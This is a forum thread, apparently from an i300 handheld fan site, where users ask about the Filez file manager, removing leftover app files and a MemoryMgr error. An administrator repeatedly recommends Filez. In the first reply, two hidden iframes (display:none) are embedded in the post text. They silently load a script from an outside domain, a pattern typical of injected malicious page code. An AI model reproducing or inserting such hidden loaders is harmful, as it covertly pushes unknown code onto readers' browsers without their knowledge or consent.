+ Reply to Thread

Thread: Filez?

Question Filez?

Anyone used Filez on the i300 successfully?

Please share your experiences...

Prahneum<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    He he he

Administrator

Arrow

YES!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

i used it on the 6035 and on the i300... its fabulous!!!! you need to get it.. it really helsp you to know what apps are installed and their counterparts.. works very well! and now that i have the i300 i can see the colors in it now... if your conteplating installing it, dont worry.. it works well on the i300 as i have had it on there since i got the phone.....

..go grab it!!

WHere can I find it? I looked on CNET, but there is nothing called Filez....

Administrator

Arrow

filez can be found here.

Thanks Marc, or should I say, Mr Tronix?

Question Suggestions on good deletion program

I have been demoing lots of apps/ programs... Most of which I have not kept... Anyone have suggestions on a program to completely delete entire program... data base... prefs...etc. It seems I end up with some extra "trash" when I delete programs I no longer want.

Thanks in advance,

Stuart

Administrator

Arrow

as stated earlier in this thread, FILEZ is a good app to have.

Angry How do I uninstall?

Hi!
    Does anyone know how I completely ininstal a program that installed more than one file? I dont know what is related to my installed file and what is from other installations of other programs I did previously. (Note, the program in questions was one of two installations I synched at the same time.)
    Neuroticly Yours,
    Lovei300
    PS: Will "filez" help in this matter?

Administrator

Arrow

Will "filez" help in this matter?
    yes! thats exactly what you need. go grab it!

Help! Filez didnt work!

Filez did not work, all it did was delete one file, but I have so many files from this one app (that I deleted)! How do I figure out which file is associated with the app I deleted (so I can delete them to) and which file is from other apps I want to keep?
    Lovei300

Administrator

Arrow

it does work.. you just need to find out what the extention is .. check the box to hide the roms so you will have less on the screen...

then loook at the one that have the same extention name on the end and delete those..

Lingering garbage after software deletions

I've gone through a lot of trial versions, shareware, and freeware, of which only a small percentage has "stuck" with me.

How do I get rid of the junk that accumulates? I've tried Squeaky Clean, but it requires me to make judgments, and a couple of times I've had to reinstall software because I guessed wrong.

Perhaps there's a launcher that keeps track of files generated by installations, and permits perfect removals. Or should be...
    The older I get, the better I was...

Administrator

Arrow

without a doubt FILEZ is what you need. keep a log on the extention names so when you go to delete them you will see which apps belong with which...

Ex Jr Member
    ... or PrefMgr. This program 'scans', 'finds' and 'deletes' orphans automatically... that is, after you tell it to do so.

-BEJ

This is moving back to the original topic. Filez doesn't work for me.

When I launch Filez and "View and Edit Files," I get "MemoryMgr.c, Line:4390, Invalid handle" and have to reset. This same error pops up when I run Z'Catalog, RamHog, or even the built in Palm info function.

I cannot view and selectively delete databases. I don't think that I have anything unusual on my palm and have removed all of my hacks (some of the pdaapps hacks, graffiti and logo hacks), but would like to get into my system and clean things up. Do I have to start over and install my apps one by one?

I feel like I've seen this error before, maybe when I tried using AvantGo, but didn't see any mention of it when searching the forums.

I may try some of the suggested apps here, but want to know if anyone else has experienced this.

Administrator

Arrow

would like to get into my system and clean things up. Do I have to start over and install my apps one by one?
    thats what your goona have to do.. you have probably deleted so much stuff and have so much junk left over it has messed up your registries.. filez WILL work for you.. you just cant get into it for it to work...

so i suggest doing a cold reset and NOT resyncing to your old stuff.. just do a clean, manual install.....

Filez for I300. What is it?

I've heard about this program a lot, but I still don't know know what it does. What is it good for?

TONY
    http://i300-fanatic.cjb.net

Administrator

Arrow

filez is good for allowing you to see all the programs and their extention names in memory. it shows you whats in ROM and allows you more flexibility to delete unused or left over apps from programs you have deleted.

their is a post earlier in this thread on where to get it...